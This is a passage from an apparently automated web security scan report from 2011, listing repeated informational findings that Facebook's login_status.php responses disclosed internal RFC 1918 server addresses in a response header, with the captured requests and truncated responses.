GET /extern/login_status.php?api_key=238200696226156&app_id=238200696226156&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df383cf9afc%26origin%3Dhttp%253A%252F%252Fforums.cpanel.net%252Ffda116178%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1b7a2f254%26origin%3Dhttp%253A%252F%252Fforums.cpanel.net%252Ffda116178%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2e0f2bec8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bd702454%26origin%3Dhttp%253A%252F%252Fforums.cpanel.net%252Ffda116178%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2e0f2bec8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df352a5d3c8%26origin%3Dhttp%253A%252F%252Fforums.cpanel.net%252Ffda116178%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2e0f2bec8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df22089c0e8%26origin%3Dhttp%253A%252F%252Fforums.cpanel.net%252Ffda116178%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2e0f2bec8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.22.49
X-Cnection: close
Date: Fri, 16 Sep 2011 19:42:58 GMT
Content-Length: 245

<script type="text/javascript">
parent.postMessage("cb=f352a5d3c8&origin=http\u00253A\u00252F\u00252Fforums.cpanel.net\u00252Ffda116178&relation=parent&transport=postmessage&frame=f2e0f2bec8", "http:\
...[SNIP]...

21.36. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=116046798441464&app_id=116046798441464&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1380df884%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff1815548cc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3d132f178%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff1815548cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df232dd731%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3759a64bc%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff1815548cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df232dd731&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f8d8b6b%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff1815548cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df232dd731&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28428b388%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff1815548cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df232dd731&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.15.21
X-Cnection: close
Date: Sat, 17 Sep 2011 00:50:37 GMT
Content-Length: 239

<script type="text/javascript">
parent.postMessage("cb=f1f8d8b6b&origin=http\u00253A\u00252F\u00252Fwww.toofab.com\u00252Ff1815548cc&relation=parent&transport=postmessage&frame=f232dd731", "http:\/\/w
...[SNIP]...

21.37. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=223691147655074&app_id=223691147655074&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2806cc44%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Fff3be1bc4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df805b3df8%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Fff3be1bc4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36e94f414%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df24329e14%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Fff3be1bc4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36e94f414&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3c74db5a%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Fff3be1bc4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36e94f414&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39295ec74%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Fff3be1bc4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36e94f414&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/projects/your_tax_dollars.bg?src=Mwra
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.142.51
X-Cnection: close
Date: Sat, 17 Sep 2011 01:05:35 GMT
Content-Length: 242

<script type="text/javascript">
parent.postMessage("cb=f3c74db5a&origin=http\u00253A\u00252F\u00252Fbostonherald.com\u00252Fff3be1bc4&relation=parent&transport=postmessage&frame=f36e94f414", "http:\/\
...[SNIP]...

21.38. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=169076986451072&app_id=169076986451072&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e8387498%26origin%3Dhttp%253A%252F%252Fblekko.com%252Ff2dc50cde%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2f2effc88%26origin%3Dhttp%253A%252F%252Fblekko.com%252Ff2dc50cde%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fff78c3%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd82da794%26origin%3Dhttp%253A%252F%252Fblekko.com%252Ff2dc50cde%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fff78c3&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28adb884c%26origin%3Dhttp%253A%252F%252Fblekko.com%252Ff2dc50cde%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fff78c3&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfec882ee4%26origin%3Dhttp%253A%252F%252Fblekko.com%252Ff2dc50cde%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fff78c3&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.19.41
X-Cnection: close
Date: Fri, 16 Sep 2011 19:44:15 GMT
Content-Length: 230

<script type="text/javascript">
parent.postMessage("cb=f28adb884c&origin=http\u00253A\u00252F\u00252Fblekko.com\u00252Ff2dc50cde&relation=parent&transport=postmessage&frame=f1fff78c3", "http:\/\/blekk
...[SNIP]...

21.39. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=116046798441464&app_id=116046798441464&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df24b6667f4%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff124e6f7f8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dffe9293b8%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff124e6f7f8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcb520d7%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df10909fb54%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff124e6f7f8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcb520d7&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a6f91954%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff124e6f7f8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcb520d7&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df191397248%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff124e6f7f8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcb520d7&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.20.69
X-Cnection: close
Date: Sat, 17 Sep 2011 00:51:02 GMT
Content-Length: 239

<script type="text/javascript">
parent.postMessage("cb=f1a6f91954&origin=http\u00253A\u00252F\u00252Fwww.toofab.com\u00252Ff124e6f7f8&relation=parent&transport=postmessage&frame=fcb520d7", "http:\/\/w
...[SNIP]...

21.40. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=223691147655074&app_id=223691147655074&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df263107c58%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff2f3f43e3%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa145137%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff2f3f43e3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfed22f2ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfec9190c%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff2f3f43e3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfed22f2ec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28cd5eb3c%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff2f3f43e3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfed22f2ec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df388643578%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff2f3f43e3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfed22f2ec&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.133.21
X-Cnection: close
Date: Sat, 17 Sep 2011 01:00:28 GMT
Content-Length: 242

<script type="text/javascript">
parent.postMessage("cb=f28cd5eb3c&origin=http\u00253A\u00252F\u00252Fbostonherald.com\u00252Ff2f3f43e3&relation=parent&transport=postmessage&frame=fed22f2ec", "http:\/\
...[SNIP]...

21.41. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=223691147655074&app_id=223691147655074&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2303801dc%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff3b6295d4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df26f987178%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff3b6295d4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25a615a0%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df132ddd288%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff3b6295d4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25a615a0&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2f008de0%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff3b6295d4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25a615a0&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a062a014%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff3b6295d4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25a615a0&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/inside_track/view.bg?articleid=1366225&srvc=track&position=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.149.30
X-Cnection: close
Date: Sat, 17 Sep 2011 01:06:14 GMT
Content-Length: 241

<script type="text/javascript">
parent.postMessage("cb=f2f008de0&origin=http\u00253A\u00252F\u00252Fbostonherald.com\u00252Ff3b6295d4&relation=parent&transport=postmessage&frame=f25a615a0", "http:\/\/
...[SNIP]...

21.42. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=127075842605&app_id=127075842605&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2808a93ec%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff2c51297b%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39efd34b%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff2c51297b%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30a5df68%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c3403774%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff2c51297b%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30a5df68&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df130b2b4a%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff2c51297b%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30a5df68&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dff6bee014%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff2c51297b%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30a5df68&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.10.43
X-Cnection: close
Date: Sat, 17 Sep 2011 00:52:23 GMT
Content-Length: 231

<script type="text/javascript">
parent.postMessage("cb=f130b2b4a&origin=http\u00253A\u00252F\u00252Fwww.tmz.com\u00252Ff2c51297b&relation=parent&transport=postmessage&frame=f30a5df68", "http:\/\/www.t
...[SNIP]...

21.43. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=116046798441464&app_id=116046798441464&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df261f9d44%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff187237d1c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32426809%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff187237d1c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d7cd67c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df21f4f88c4%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff187237d1c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d7cd67c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df330b9929%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff187237d1c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d7cd67c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3adf374d4%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff187237d1c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d7cd67c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM; lsd=JJyyQ

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.154.59
X-Cnection: close
Date: Sat, 17 Sep 2011 00:58:30 GMT
Content-Length: 239

<script type="text/javascript">
parent.postMessage("cb=f330b9929&origin=http\u00253A\u00252F\u00252Fwww.toofab.com\u00252Ff187237d1c&relation=parent&transport=postmessage&frame=f2d7cd67c", "http:\/\/w
...[SNIP]...

21.44. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=374095054754&app_id=374095054754&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df371375e3%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff31ad8ddd8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df117a58fc4%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff31ad8ddd8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e19f3088%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1095b596%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff31ad8ddd8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e19f3088&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df859b6108%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff31ad8ddd8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e19f3088&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe109eb14%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff31ad8ddd8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e19f3088&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM; lsd=JJyyQ

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.141.53
X-Cnection: close
Date: Sat, 17 Sep 2011 00:57:25 GMT
Content-Length: 242

<script type="text/javascript">
parent.postMessage("cb=f859b6108&origin=http\u00253A\u00252F\u00252Fbeta.abc.go.com\u00252Ff31ad8ddd8&relation=parent&transport=postmessage&frame=f3e19f3088", "http:\/\
